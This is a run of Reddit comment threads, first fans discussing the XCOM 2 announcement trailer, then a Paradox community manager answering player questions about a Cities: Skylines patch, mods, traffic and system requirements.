We don't allow low effort or off-topic comments *(jokes, puns, memes, reaction gifs, personal attacks or other types of comments that doesn't add anything relevant to the discussion)* in /r/Games.

You can find the subreddit rules here: http://www.reddit.com/r/Games/wiki/rules#wiki_rules I do hope that melee weapons aren't quite so ham fisted in actual gameplay.  I could see them working, but it was sort of nice using only relatively practical military type weapons in the first game. Judging by the trailer, you might play a guerilla rebel group of sorts AND you are the one attacking (as opposed to the first game). 

Would make sense for them to use silent weapons the are easy on resources as well. XCOM can get away with it as there are enemies that could easily be cleaved up. As Grinchy as it'll sound I'm so pleased this is a PC-only launch, at least to begin with. I'm tired of all this downgrading in both scale and fidelity. Hopefully it'll get competent console ports afterwards, though.  Yes! An Xcom game with a feasible argument as to why you can only send a handful of troops on each mission instead of millions of soldiers which would be the reasonable response in the other XCOM games. I enjoyed Xcom so much that I'm pretty sure I will buy this. however, I also have been disappointed often enough that I will not pre-order or buy on the first day. [deleted] EU was such a good game, I think the "more of the same" approach would work best for XCOM 2. However they could improve that lame dogfight minigame and cut away alil from that rng bs. Ufo sightings, missrate, character development, abductions... everything was so random and made IM Impossible quite an frustrating experience.  Been waiting a while for a new Xcom game. Note sure I'm sold on the new enemies, though. Was hoping to see at least some familiar old faces. Still, this is the icing on the cake of a fantastic year in PC gaming so far. Snakemen are about as familiar as enemies get in the x-com universe. I can understand where that fan service was missed by someone who didn't play the originals. I'm sure you'll see more familiar faces from the reboot. What I'm interested to see is how the the idea that you're a guerilla band waging war on the already entrenched forces of advent will flow over in to gameplay.

Will we be taking a more proactive stance toward missions? Organizing raids ourselves instead of waiting for aliens to fight against? Hopefully this one has good AI and lacks the enemies that spawn a few tiles away from your dudes as soon as they get to a certain spot Is it true its going to be a PC exclusive? This was perfect. New enemies and units. A new world. New XCom Base.

I can't wait. I'm practically jizzing in my pants. A lot of people are asking why they wouldn't save this for E3. It's actually rather smart to announce it now. Everyone is saving everything for the big show, so they have some breathing room to announce it without fear of being overshadowed. Well played 2K.  Look. I'm an adult. I probably game for about thirty years now. And frankly I haven't been excited for a game for over a decade, since everything usually (not always) is the same type of game, but in a new jacket.

But this... I felt like a 16 year old gamer-geek again. I loved the original X-Coms, was semi-addicted to the recent remake and its expansion. Although it's just the same type of game, but in a new jacket. I know.

I want this. Now. The first thought I had watching this was, "Wait, we play as terrorists now?"

Fuck yeah. Look, I know terrorism is all bad in the real world, but the gameplay implications it forces are super interesting- how to wittle down an overwhelming force, hit and run tactics, the PR of innocent lives lost(and thus turning the population against you) vs getting your objective done- there's so much there.

Not to mention, it always felt awkward that we were an organization with huge funding from all over the world, yet we could only respond to one fight at a time. It felt odd that the soldiers we were getting seemed relatively inexperienced. It felt like we were doing less with more, not the other way around.

This could be a win for gameplay, theme, and making the world stand out. I love it. Terrorists and insurgents are not the same thing. There are certainly some similarities to their tactics (guerrilla warfare), but the primary difference is that terrorists specifically target civilians in an attempt to force a change, while insurgents attack the group they're fighting against.  I will buy this on launch, I love the series and XCOM EU was probably my favorite game of 2012 and EW made it even more amazing. This combined with PC exclusivity (yay less consolization!) and Linux version makes me hyped. 

Also Snakemen! I hope they are adding more features from the original games without making it too complicated. I would love a bigger squad and more management options, but UFO: EU got a bit ridiculous with all the stuff it had.  To me X-COM is one of the best strategy games the last years. It's the best remake of an original classic. And all that on PC. The fact that I can replay the game with all add-ons on a tablet and even the controls are great does make it the best tablet game by a long shot. Of course this is a subjective view but I am more excited than for all the blockbuster games that were and will be released this year.

Please don't fuck this up! Excited about new XCOM. That being said, trailer is bit meh. Group of soldiers running on a street of a big metropolis in formation and nobody notices them? The guy with the sword is also a bit silly. so is XCOM worth buying now? Is the dlc necessary or does the core game hold up on its own? Definitely pick up both the base game and Enemy Within. Enemy Within adds so much to Enemy Unknown that it can be considered to be the completed version, and (if you're playing on PC) EW is required for the Long War mod. Long War isn't for everyone, but it adds an absolute ton of new features and replay-ability. 

As for whether or not it's worth picking up, I'm going to give a very biased "Yes". If you like strategy and tactics games it's one hundred percent worth your time. 

 I wonder if this guerrilla warfare thing is going to actually affect the gameplay somehow, like different mission structure and such. You could do some cool stuff with that.

EDIT: I hope there's more nations than in EU. Having only 20 countries and only a bit more soldier nationalities was lame.   Honestly- they had me interested at "XCOM 2". After the stellar job they did with the reboot I really look forward to finding out more about this game. Then waiting several months to buy it on sale since I refuse to pay full price to any game published by the price gouging 2K games.  There are few games announcement that could have made me as happy as I am now. I've watched that trailer at least 5 times now, that "Welcome back commander" give me the shiver every time. I cannot wait. Hell, I think I might start a new playthrough of Enemy Within to refresh my memory on the ending.

Edit: Oh yeah I remember hearing about the long war mod, I might actually give this a chance! I just hope that this time around they won't do a watered down but improved version of Xcom, while i did like XC:EU it just felt lackluster in pretty much every way when compared to the older titles in the series.    
The 2 token system for movement was complete bullshit, the camera controls infuriating at times. The lack of stances, facing directions and small troop size, meager management and missing depth in combat were all more than just disappointing and the aerial interception was just an utter joke in EU. 

So i'm really glad hearing that they actually dropped the idea of developing the game for multi platform given just how bad of an influence the consoles had on the core gameplay. Now i'm actually a bit hyped for XCOM 2 given all the possibler improvements they could do.  
 I'll definitely be playing, though I'm not a fan of sequels that invalidate everything you did in the original. "Haha, you fought all the aliens but they took over anyway. Sucks, bro." The aliens got what they wanted when you took down the Temple Ship at the end of the first game. You created a psionic supersolider, and showed them exactly what humanity is capable of, given the right tinkering.

The Temple Ship, and all the other battleships, fighters, scouts, and research vessels you fight over the course of EU/EW all came from someplace elsewhere. This is a massive empire you're fighting, having subjugated countless denizens of a dozen different intelligent species (and possibly more).

The one Temple Ship you bring down is not the end of that empire. Throughout EU/EW, they make it pretty clear that, if the alien threat wanted to subjugate Earth, they could in a heartbeat. 

My take on it is that, once the imperialistic alien threat knows the extent of what is possible, and what they can make out of human DNA, they swoop right in. The XCOM project was able to fend off the initial invasion force, and brought down the Temple Ship, but only just. A full-scale invasion puts humanity on the back foot. Imagine, not just one Temple Ship, but a dozen, along with a whole fleet of battleships, and their compliments of fighters and abduction craft, all coming out of slipspace in Earth's immediate vicinity.

The XCOM project couldn't deal with a threat on that scale. So they go underground, and bide their time. The Council members are forced to close down communications, while Bradford, Shen, Vahlen, and the rest of the operations team figure out what to do with little funding, a lot of facilities they can't upkeep, and some bitchin' sweet alien tech they barely understand.

XCOM bides its time, and waits. Decades later, the planet is policed by a fair compliment, but the major invasion force has moved on to their next target. Bradford, now a grizzled old veteran, finally gets the call from the Council's leader; a supply ship, lightly guarded and full equipped with the evasive capabilities that can keep XCOM alive if they stay on the run, is en route. One thing I like about how that looks is that they've mostly kept the clear and bold/chunky art style. It's really nice to have a game where you can 'read' it easily. As per usual in Skylines related threads, feel free to ask me any question and I'll do my best to be of service.

Also, super excited about this update! My european cities look so *fresh*. Any changes to the traffic or is that for the future?  Traffic changes / redesign is a huge task and something we have chosen to be careful with - as all systems rely on it working properly. Please keep in mind our team is only 13 members, meaning we have to focus on one large project at a time to ensure we don't start bloating :)

Rest assured it's something we're working on improving, even if there is no ETA or public information about the what's and why's.  I'm glad to hear that! Good luck to the team!  Thanks! This is honestly the least exciting update compared to what we have planned for the future ;) That gets me so excited for the future! Any thoughts on publishing a timeline like Codemasters has done for Dirt? https://www.dirtgame.com/uk/timeline

I can see how it could create trouble if the team starts to get behind, or runs into brickwalls, but it's nice to have things to look forward to.  The Dirt timeline is generally just vague enough to allow some wiggle room, while offering enough details to get people excited. Software companies hate divulging timelines, because development is unpredictable and priorities shift/change, unexpected obstacles appear, etc. 

It's hard to understand this as a consumer (but why can't you just tell me if it's coming?), but work for a day at a company that deals with deliverables and you'd understand. You never want to promise or even hint at something that has the possibility of not coming to fruition, as the backlash would be massive. &gt; You never want to promise or even hint at something that has the possibility of not coming to fruition, as the backlash would be massive.

See: Minecraft Riot Games used to be very transparent about stuff the dev team was working on (Magma Chamber?) and it didn't really work out for them. Tentative stuff gets cancelled all the time and consumers just don't understand that... I'm glad to see the PDS philosophy prevalent in other Paradox games like Cities Well then BRB buying cities skylines.  Derailing for a moment, but hear me out:

How is it that we can be cool with some devs being upfront like this but not others (star citizen for example)? It seems that despite most devs being open about as much as they can, most users still have the "no i want moar" mentality. Sticking with the Star Citizen example, is it that they have lots of money/decently large staff for a crowdfunded game?

Not calling anyone out, I'm only pointing out trends that I see Most people are either backing Star Citizen in which case they know and love the openness or they only read about Star Citizen through articles from gaming websites, in which case it becomes a very distorted image of a game that seems to have been in development forever yet still isn't done. 

What people don't take into account is that Star Citizen has been sharing an immense amount of information since the very start of development. Compare this to a game of similar scope and size, which might take 5 years to make, and we're only in year 3 now. Many games only announce that they're being made a year before release, when things are much more set in stone. Different individuals respond differently. Hiveminds aren't actually *that* real. Because hive minds are fickle and will easily run with the default perspective of the subreddit/community. If the first few people decided that Paradox had really messed up by doing anything before fixing the traffic behavior, then this subreddit would be mostly whining. But luckily for us Paradox has a reputation for follow-through on their games, and people were grateful for the new updates and willing to wait for traffic changes in the future.

Honestly, I'm happy because I would've paid what I did for the game that I originally bought. The patch is extremely welcome, but they didn't need it to convince me to buy the game. &gt; But luckily for us Paradox has a reputation for follow-through on their games

This is actually really recent. Everything before CK2 was really an absolute shitshow every time they launched.

 For a while, half of my EU3's text was in german even though I selected english, haha. Is that 13 people developed the game or 13 people are left maintaining and making content? 

Every game needs a Moo like you. Actually 9 people for most of the time, we scaled up the last few months. But yes, CO is only a team of 13. Add a few publishing people from Paradox and that's all of us. That's actually just incredible, when you think about it. Makes you wonder how EA managed to fuck up SimCity with such a larger pool of resources and cash. Simply, with a large pool of resources and cash. [The Mythical Man-Month](http://en.wikipedia.org/wiki/The_Mythical_Man-Month#The_mythical_man-month) was published 40 years ago and software houses keep making the same mistakes. [deleted] [deleted] There is a saying about too many chefs spoiling the soup... Something about C.O.O.K.S. fighting B.R.o.t.H.? Especially when each new chef needs to be brought up to speed on all of the tech being used and the code base as it currently exists.  I don't think chefs deal with code. It's EA.  They had suits who have never seen a video game make decisions based on marketing suits who have never seen a video game.  By having a larger pool of resources and cash and thinking that makes a good game. Less swag and coke, more people actually producing shit and knowing what games are about. Any plans to expand due to the huge success of  C:S? I imagine Paradox would be interested in turning them into another Paradox studio, just like they did with the Magicka developers. More money for Paradox and more resources for the CS developers. If CO expands I would love it if they would make a roller coaster tycoon game in the future. I feel like that genre would be perfect for CO. They really are an incredible Dev team. ...wow. That's amazing. You folks have me wanting this game very much. I wish I could afford it right now but I will definitely at some point and I will be recommending it to my friends. I appreciate developers who put a ton of love into their work and who are grateful for their community.  Would the implementation of a dedicated turning lane be a supportable solution?

I'm not a programmer by any stretch, but I've noticed a vast majority of my traffic grind is caused by cars waiting to turn across oncoming traffic. I'll see if I can prompt a future dev diary or post on this, as the topic is a bit too wide to cover in this specific thread. Sorry, don't want to dodge your question. It's just a huge thing to discuss if one wants to cover all factors! That would be great. I always love reading dev diaries. Not to turn this into a dev-request thread, but if you're adding turn lanes, are there any ideas to generalize to building lanes (as opposed to entire roads)? The jump between 2-lane and 4-lane is kind of awkward, because 4-lane takes up the same space as 6-lane and doesn't even give you more lanes than a 2-lane-one-way, so I usually just jump straight to 6-lane.

Unrelated, but could we also get some 2-lanes-with-curb-space so that expanding roads doesn't destroy growables or require the moving of ploppables? I wish every other small game studios out there are like you guys.  You are awesome. I saw the top comment and thought "Oh, cool, a guy who has probably played a bunch and is familiar with the product is answering questions."

Nope, it's the dev team. Keep it up. Haven't made the purchase yet, but at this point it is a question of when, not if.  TotallyMoo - I'm writing this here because I hope it gets some visibility. Is it possible (or would you please consider) to add a volume slider for the water sounds? I love the soundscape of the game, but the white noise of water really really really bugs me. I end up just turning off the sound. I would love to be able to adjust this specific sound (or even class of sound). Ambient isn't quite it (as far as I can tell). Any thoughts on this? Love the game, keep kicking ass! Traffic++ has a really active team (they already hotfixed their mod for the new patch) and some really interesting ideas. It doesn't fix traffic, but it helps!

http://www.reddit.com/r/CitiesSkylines/comments/36i9dg/hotfix_traffic_for_cs_110_patch/

https://steamcommunity.com/sharedfiles/filedetails/?id=409184143 In Sim City 4 there was an option to toggle between a few distinct building styles in your city every so many years. Do you think that particular flavor option will eventually come to C:S?  Perhaps. I'd personally love to see it, as I am a big fan of Singapore-esque cities where architecture and styles are mixed widely. Nothing we've spoken publicly about though :) Malaysian here, and yes, would love Southeast Asian architecture where everything's jumbled into each other.  
  
Also, I don't know why I feel the need to say this but I haven't bought the game even though seeing your community engagement and the direction of the team - it's everything I want.  
  
Just gotta wait till *after* vacation with gf to make sure I still have enough $$ allocated for games. Life comes before gaming, simple as that. Hope you end up getting it eventually! Cheers for the support :) I don't own Cities yet, but I've been reading the update threads since it's release and I wanted to give you credit for being excellent at your job as a Community Manager. It is refreshing to see a CM that is truly part of the community and not just a talking piece. ...I never expected to see Singapore being referenced here. \\o/ It'd be cool to be able to specify building styles in individual districts. cities on moon/mars when ... \*adds to notes: bother CO about space expansion* Can we combine it with Kerbal Space Program, and go through the whole process of getting people from our Kerbin City to our Mun City. Get the guy who made Banished to give it a survival aspect as well and you will have the game of my dreams... Ah yes, Kerbal Space Cities: SkylineZ &gt; Ah yes, Kerbal Space Cities: Skyline~~Z~~

We don't need Zombies, I am pretty much done with zombies.  I agree that the zombies theme has been ~~done to death~~ overused, but a fully developed city sim where you ward off zombies in addition to managing power/water/**traffic** sounds pretty cool.  Herd the zombies onto the 405! They'll never make it past Santa Monica! You'll need zombies because there won't be any living people left when KSP is integrated. Who will man your space program?  Crab People, obviously Taste like crab, look like people.  Future DLC/update "Cities: Space"? Metro still won't be able to leave ground? Like, will you be able to do a tunnel exit and make a bridge over river and then back to under ground?

&gt; Cruise ships no longer travel over land :(

Was this really necessary? :'( I'd like to see a mod that allows you to toggle this. Personally I find ships sailing across land obnoxious, but I can totally see how people would like to keep it for amusement's sake. Should just mod it in. Bugs shouldn't be something prioritized by main developers to be kept around for amusement's sakes of a minority. What level / density do my residential zones have to be in order for European buildings to start appearing?
 High and/or offices - on the European biome/maps. Thank you! Have you thought about adding something like a housing construction grant? I'm loving the game but whenever I get to around 20,000+ people  it slows down fantastically and I find its drags while I wait for new people to move in to expand.

Am I missing something, is there a way to attract people to your city faster? 

Thanks for your community involvement, its amazing. Hmm, it could be a good idea for a policy but honestly it's not an optimal solution.

Have you tried aggressively raising land value? If you hover over the tooltips after you've clicked a residence you can see what is needed to level up the building. This will prompt a population spurt and often trigger further needs.

Things you can do to solve this is: expand services &amp; coverage, build all types of schools, create parks, monuments and unique buildings, create nearby public transit, remove nearby noise/ground pollution etc.  Haven't been keeping up with the game since the launch, but I was wondering if there were any changes/are there planned for:

* Industry - is there or will be a high-tech industry? Lack of it made overeducation a thing and that was quite sad that I had to keep some districts intentionally poor and stupid.

* Public transport - as developed as it was, lack of anything more than trains, strictly-underground metro and buses was quite limiting.

* Prize buildings - base game didn't have that many and some of them were kind of a strict progression, like malls. No major changes to industry or public transit yet. 

Several new unique buildings have been added in this update, though! &gt; Industry - is there or will be a high-tech industry? Lack of it made overeducation a thing and that was quite sad that I had to keep some districts intentionally poor and stupid.

Hmm I swear industry eventually moves into "high tech" by raising land value. 

 How is the performance of this game on newer OSX systems? I'd like to buy it but I don't want to waste 30 if its unplayable.  Depends on your hardware. If you paste the details here I'll be able to tell you how well it will run :) Speaking of OS X, are you guys aware that the game doesn't work correctly on systems with scaled/Retina resolutions? I have a 4K display attached to my Mac with 2x scaling so the UI is readable, but due to this Cities: Skylines will only go up to 1080p, meaning I get really blocky graphics. Other games (I play World of Warcraft and other Blizzard games) see the native resolution of my display correctly and I can get some sweet 4K gaming. Perhaps I am misreading your problem, but did you try starting with a custom resolution? You can add something like

    -screen-height 1080 -screen-width 2560

to your launch options and the game will start in that resolution (it's a Unity feature). I don't know if that works for OSX, though.

If the UI is too small to read then, use [ScaleUI](http://steamcommunity.com/sharedfiles/filedetails/?id=409338401) (which I created) or [Text Scale Mod](http://steamcommunity.com/sharedfiles/filedetails/?id=407225523). Unfortunately the flags don't work - the game just resets to 640x480 when it's launched.

The problem is that that game is misreading the screensize. On Mac OS systems, there are two - a "looks like" size, which on my system is 1920x1080 (so the normal system UI is big enough to read) and a "raw pixels" size, which on my 4K display is 3840x2160. C:S is reading the "looks like" size, when it should be reading the "raw pixels" size. Other games do this correctly. 

Edit: Manually resetting the system to not use scaling at all before launching the game allows me to play in 4K. The game really should do this for me, though. Thank god I read this, I'm running a 13" retina right now and that doesn't sound enjoyable.

How does WoW run btw?  On my 13" MBP, terribly - I can't run WoW at the native resolution. On my Mac Pro with the 4K display mentioned above, it runs pretty awesomely.  I run a macbook pro 13" with windows 7. I've heard mixed reviews about the performance because of the integrated Intel graphics. Ah, the integrated graphics are not supported (below minimum requirements). They work for some users but not up to par - so we do not recommend playing on a unit that has no dedicated GPU. Sorry! Processor  2.3 GHz Intel Core i5

Memory  8 GB 1333 MHz DDR3

Intel HD Graphics 3000 512 MB
 No chance, sorry. That GPU is far, far below minimum requirements. Figured, guess I will have to wait for my parts to get here and I'll get it on windows/ Can you guarantee my success of a Urban Design/City Planning MSc application from playing Cities: Skylines? I will. College is over rated. Hands on is where it's at. Make sure you prominently mention some of your better city builds in your cover letter. I love your interaction on Reddit so much that it might get me to buy the game, despite not having had an interest in "building simulators" since Sim City 2000 and one of the old Roller Coaster Tycoon games. It's wonderful to see such care for the community! Will there be any changes to the education system? I feel its lackluster right now, maybe add some options for upgrade and research in different areas to educate our people for industry or commerce or farming, etc. Nothing planned, no. Or at least not publicly. 

I agree it could be nice with further depth. This is what we're speaking about when saying "future updates will be focused on gameplay/features". Many systems can have additional functionality tied to them and just add to the fun! Happy Cakeday! Did you make your account just for this job or are you a regular redditor as is?  Thanks! Check my post history if you wish ;) This account is roughly a year older than my employment at Paradox and is used for a lot of non-work posting too. 

*(This is kind of off topic, though, so if you want to continue chatting feel free to send me a PM)* Yup, I see you making great discussions on /r/games fairly regularly! Hi there, great game! I was encountering problems with education and workers, as late in the game my industry would get abandoned because of a lack of uneducated workers. Is there a solution to this? Do I just build residential zones with no schools? I've been looking for an answer and can't find one, that's my only complaint. Thanks for the awesome game!  Best solution is to keep growing. A constant influx of new citizens will keep your low end jobs satisfied. :) Thanks man! You are one cool game dev.  or isolate a section of monkeys to keep them uneducated, on the fringes of the system. I'm wondering, is Skylines stills selling well? I'm asking this because (I'm assuming) more long term sales will mean the developers are able/allowed to work on the game longer as well. Yup, and with updates it of course sells even better. We're back in the top 10 sellers again! :D Good to hear! How do you feel that all news outlets are announcing the patch as 'tunnels, European buildings and BREAKS mods', when virtually all major game patches break mods in some way? You've gone through a lot of trouble to not break mods if possible, more than many other games, so does having the media point out that minor part of the patch leave a bit of a sour taste? Care to link me to such articles? Journalists are free to write whatever they consider sane, it's up to the readers to criticize what they are exposed to imo. I feel it's a bit petty if done to bait clicks, understandable if the purpose is to warn/inform people. 

Very hard topic to cover without a lengthy discussion not fit in this thread :) Here you go:

http://kotaku.com/cities-skylines-patch-adds-tunnels-may-disable-some-m-1705503217

http://www.polygon.com/2015/5/19/8624955/cities-skylines-tunnels-broken-mods Both those articles have perfectly legit title phrasing and bring up an issue that people need to see. That's A-OK in my book! :) Thanks for sharing, appreciate it. I still think it's not the most important thing to mention in the title, from an objective standpoint, although it could be much more click bait-y. Just annoys me to see that your hard work in making sure that many mods won't break/can be easily fixed is kind of ignored. If you hadn't put that paragraph in your announcement, the media would not have mentioned it.

For what it's worth, I do want to convey my gratitude/focus on your work in ensuring the modding community's easy transition with this patch. You guys are a shining light in the gaming world if you ask me!

 It's important to anyone who has mods who's considering upgrading. They might want to hold off. More important than tunnels in that respect. [deleted] Would you recommend I buy it now or wait for the summer sale?

Because by God I'm gonna play this game Depends on your economic situation. It's only $30 on steam, cheaper in many other places. Do what you think is responsible :)

*I can't confirm it actually being on the summer sale though.* I'm not /u/TotallyMoo, but I would recommend getting it now. If City Builders are your thing, then it'll be worth every cent I haven't played one since sim city 2000 and that was like 50 years ago, I love the look of this one so I'm totally getting it and this update has me just waiting to get home so I can put 30$ in my disk drive It was my first go into city games since sim city 2000, and while I've been having a great time with it, it's much more traffic focused than I remember SC2k being.

Definitely worth every penny though.
 I think an important thing to do is also consider who and how much you want to support a development team.

Cities Skylines has gotten really good community relations, and people have a really good impression of them. If you want to support that, show your hand by giving them more money (if possible). Gotta vote with your wallet! Can Paradox add an option to increase the font size? My computer can't support a high resolution and I don't like having to put on my reading glasses to see what Chirpy's chirping about. I imagine there would be other mildly vision-impaired people who would appreciate it as well. There are 2 mods for that:

* [Text Scale Mod](http://steamcommunity.com/sharedfiles/filedetails/?id=407225523)
* [ScaleUI](http://steamcommunity.com/sharedfiles/filedetails/?id=409338401) (one of [my](http://steamcommunity.com/profiles/76561197970384939/myworkshopfiles/?appid=255710) mods and inspired by Text Scale Mod)

I have not tested ScaleUI with 1.1.0b yet, but I'll update it if I find new issues.

Edit: found no problems with v1.1.0b and ScaleUI. It's been considered but, unfortunately, the UI is not very scaleable. We're looking for solutions to increased accessibility. 

I reckon there's an OK-working mod for it, though!   I love the game, but I feel like it misses some Randomness that the player needs to handle. I don't talk about Monsters or catastrophes. I'm thinking about, let's say, not ideal demands of the citizens that might be temporary and need to be achieved to gain an advantage. I'm not sure if this is understandable... xD Understandable and agreed. Our #1 goal with future expansions is to add more gameplay, depth and functionality. Further challenging our players without bloating the game, so to say. That sounds really good. And you know what I wouldn't give a fuck about this answer if it wasn't you and your company. Have a nice day. Wow as someone who doesn't own the game (yet) I find it amazing that you take the time to interact with the community and actually listen to them! Cheers and good on you guys! Off topic,  but I just want to say you guys are amazing. Watching you build the game and respond to the community has been inspiring and refreshing.  This was the first thing that happened on the new map:

http://steamcommunity.com/sharedfiles/filedetails/?id=445508907

:( Any plans to have the game available on gog.com?  I'm trying to make a switch from Steam to GOG. Any plans to release Cities: Skylines on that platform? I mean, I'll end up buying it either way, but I'm just curious. Right now no, sorry! It's a great platform though. Will there be a system of economic class in the future? So we can have things like low wealth high density buildings, high wealth high density, medium wealth low density and so on?  i believe that is determined by education and landvalue together


 What are the plans moving forward? Like numerous dlcs (like ck2 or eu4) or new releases every two or three years? (Or just lots of free updates but that probably isnt economically feasible, gotta keep the lights on etc) Snagged from the announcement thread:

*Cities: Skylines will continue to follow the traditions set by other recent Paradox releases such as Crusader Kings II and Europa Universalis IV of paid expansions combined with large updates of free content ensuring that all players, whether they choose to purchase the expansions or not, will have plenty of new features to look forward to. One of the major differences, however, between those titles and Cities: Skylines will be that minor DLC updates will be uncommon. The majority of content updates will be significant upgrades and additions.* 

*Going forward, we will focus on giving away the main features for free and improving the modding tools, while also selling major expansions around new mechanics. But we will also continue to offer free content such as new buildings and road types.* Ah, thank you very much, skylines is top of my list once I get the money Thanks TotalyMoo, please don't go Metsfan on us. Sorry if this has been asked a million times but are there any plans to implement disasters? earthquake, flood, nuclear etc  I have a question:

Whos decision was it to release this patch in the Witcher 3 launch week? :D (on the same day even) Why were European buildings done as a map theme, rather than a district theme or something? Now we all need are some British pubs! You're probably swimming in questions now, but I just want to let you know that I commend your transparent approach to community interaction. I've dearly enjoyed C:S as a whole but I don't know if I would have ever bought it if it weren't for the strong community behind it (people are so much better at building awesome cities than me.) It is clear that everyone at Paradox recognizes this and understands that community is key to building a strong foundation for your games.

As community manager, was this always going to be your approach to C:S? While games continue to spill into television and advertising to reach the largest audience possible, C:S has been just as successful through supporting fans and producing the best city sim possible.

Thanks for your time, this great game, and this strong community. You, and everyone else at PI, have truly done a excellent job! Are you developing a matrix like system where I can live in my European utopia?  Mixed use?
Can you have shops at street level and apartment above? [deleted] I have seen the posts, is the game worth buying? Just thought I should let you know (and let you show your bosses :P) that I have seen you pop up in all of these Cities: Skylines threads and your involvement in the community along with all of the post-release work the studio has been putting in is what finally pushed me to buy the game today.

Also, I played it for a few hours today and it is pretty fun, although the early game is pretty hard. I dunno if it gets easier/harder later, but I just hit the 6500 citizen mark (Big Town I think?) and getting there was tough. Hey TotalyMoo,

I'm not sure where to report bugs. (and this one is probably known. I'm not sure) But just in case you can pass on the word I found a really annoying one since the update.

When you're building roads and you go down to the 'select road type' menu and click on a tab, the game tries to build a road on the land area behind the tab too. It leads to a lot of accidental pieces of road.

I don't think this happened me before the patch. Just wanted to pass it on :) Sounds like a new bug indeed, thanks for the heads up. I'll add it to our bug tracker! What's on COs radar with the next patch? Nothing publicly announced yet, but it's exciting stuff. Think more depth and gameplay and you're in the right direction! Just want to say I really love the look of the game and hope I can find the money to buy myself a copy soon, I've watched a couple of Let's Plays and it looks fantastic, great work, sincerely. I do not understand if I need to start a game with an European themed map to get the European buildings
 You do need to start a map with European theme to get the European buildings :) apologies for any confusion about this Will i be able to change the theme of an already existing town of mine? And will the european buildings house less people, or are the changes purely cosmetic? Unfortunately no, it's tied to the actual map.

They house roughly the same amount of people. The changes are mostly cosmetic. Since mods need to be updated, have re-texturing been added to the editor now?

Several modders complained that once imported, all their texturing work was fixed and couldn't be updated. Are there any plans for any time themed DLC packs or updates in the future? Like a future city theme and junk.  In regards to the mods breaking, wouldn't it be "simpler" to add a beta version of the game to steam that people can opt into (IIRC Banished has this)?

This way you could release new patches "early" for anyone interested but also anyone who's creating mods would potentially be able to fix issues before the patch goes live for everyone. Okay ... GalCiv3 out of EA, new C:Skylines patch, Witcher 3 since yesterday ... GTA:V still untouched, I need to finish my pillars playthrough sometime ...


WHEN THE HELL AM I SUPPOSED TO PLAY ALL THOSE AWESOME GAMES?! I really need to outsource more stuff to my wife ... Tell me about it. I barely have time to play our own games as it is. :) Haha you want to talk about a backlog???

...I still haven't touched Uncharted 2/3, Infinite, Fallout NV DLC, Black Flag and many others. All sitting in my room unplayed. Hopefully I'll play them all this summer! Right? I just finished my expert run on Invisible Inc yesterday, had to rush it otherwise I would have to abandon it for the wticher. Now C:SKY updates? And HotS in open beta with vikings free week? And oh god Batman is coming soon as well. It's too much. At least you can. I've got two weeks until the paycheck that'll cover my case and hard drive for my build. Come on June, get here soon.  that sucks :(

need a copy of The Witcher 3? I've got a spare one from the nvidia promotion " We have worked hard to cause as few conflicts as possible with popular mods, yet this is a substantial update and with the code &amp; functionality changes some issues have been impossible to avoid. Going forward we aim to find a solution where we can work with our core modders pre-launch to give them ample time to adjust their creations before the public have access."

Can I just say how much I love this mentality? Especially with so many games these days going out of their way to prevent modding or allow very little modding, these guys really take the modding scene into consideration. Respect. Not only is it awesome and shows a significant love for their community when a developer does this, but a lot of people don't understand how much they have to care for a community in order to develop something like this, giving people the ability to easily "hook" into a games code and run mods is hardly an easy task. I bought Cities: Skylines Day 1. I really like the game and it is the closest thing to Sim City 4. My only complaint is that the game and the community emphasize the traffic planning part the most.

The building part of a city felt a bit unchallenging as well, which is a bit of a shame. Well, as reality would have it, traffic is a massive consideration and constant issue to deal with. Yes, as it was in Sim City 4 and this game offers a lot more options to customize and deal with that fun challenge.


But the amount of emphasis on it and it being the only real challenge of the game is what I'm highlighting as my one complaint. I think it's a valid complaint, really. Building cities in SC 4 did feel less focused on traffic and gave a more balanced overall feel somehow. It's hard to pinpoint exactly what it is.

Then again, I'm comparing SC 4 many years into the game (with Rush Hour) to Cities: Skylines a few months after it has released. And there's a reason I still occasionally play Skylines now and I haven't touched SC 4 in over a year. &gt;  It's hard to pinpoint exactly what it is

I think one part of it is the "agent-based" nature of the city...sure, cars still spawn and despawn all over, but generally a person sets out from home or wherever and goes to the store or work, and a route is plotted and they take it by whatever way is shortest/quickest/etc., and all that is calculated *for that person* (agent). You can click on any of them and see where they're going and follow them as they're on their way.

SimCity 4, from what I remember, the traffic would fade in and out all over the place. You couldn't pick any random car on the road and follow it to where it was going. The game could just display traffic as a somewhat more abstract representation of overall speed, congestion, etc. based on the math of road capacity, number of citizens, etc. The Rush Hour expansion added quite a bit to this, including the ability to see individual routes, but the representation was still somewhat abstracted. If you only have to calculate usage vs. capacity and display a suitable animation, you can get away with a lot more than if you *actually* have to have *each car* navigate through merges, lane changes, avoiding other cars, and so on to reach its destination. Having this type of system and the necessary tradeoffs between taking AI shortcuts like predetermined merge points (which cause backups when a car stops because it HAS to merge NOW into a solid line of cars) and giving every car on the map a full Google self-driving car type of AI is, I think, what causes C:S traffic to be a little more difficult to work around than SC4 was. I agree.  I dunno if I played the older sim city games "wrong", because I was younger and didn't know what I was doing, but with Skylines I feel like the only issue, ever, has been traffic.  It's still a fun game, but it just feels more like a traffic manager than a city builder. Yeah, I admit I got a bit spoiled by the ploppable buildings in SC5, along with the industry specializations and trading features.  It feels missing from Cities: Skylines, honestly.  Love the game, love how big the cities can grow, and the it's a ton of fun, but feels a little bare bones sometimes when your city is fledgling and you're really growing it out.

I end up playing sandbox mode all the time, basically, because it's more fun to creatively develop your city with unlimited funds as the core game mechanics aren't that interesting.

Stuff like districts and policies are woefully underdeveloped and ripe for expansion IMO.  There really should be dozens of policies that impact your cities development in different ways.     Games aren't as fun when they aren't challenging but they can also suffer when that challenge is too tough or simply annoying because the reward is inadequate.

The traffic management in this game is great, it's a constant challenge that is rewarding to conquer and it's always there. No matter how large or small your city is, you can do better with your traffic.

However this challenge aspect is lacking in other area's of it's game play. It's either just not as good as traffic, not challenging or not rewarding enough.

 Which is strange, because my experience was the opposite: the bigger my city got the less traffic seemed to be a concern. Almost like the number of cars didn't scale right with the population of the city.

It was something I found to be a bit disappointing because the soul crushing traffic problems are part of the puzzle that I really enjoy. Felt too easy.

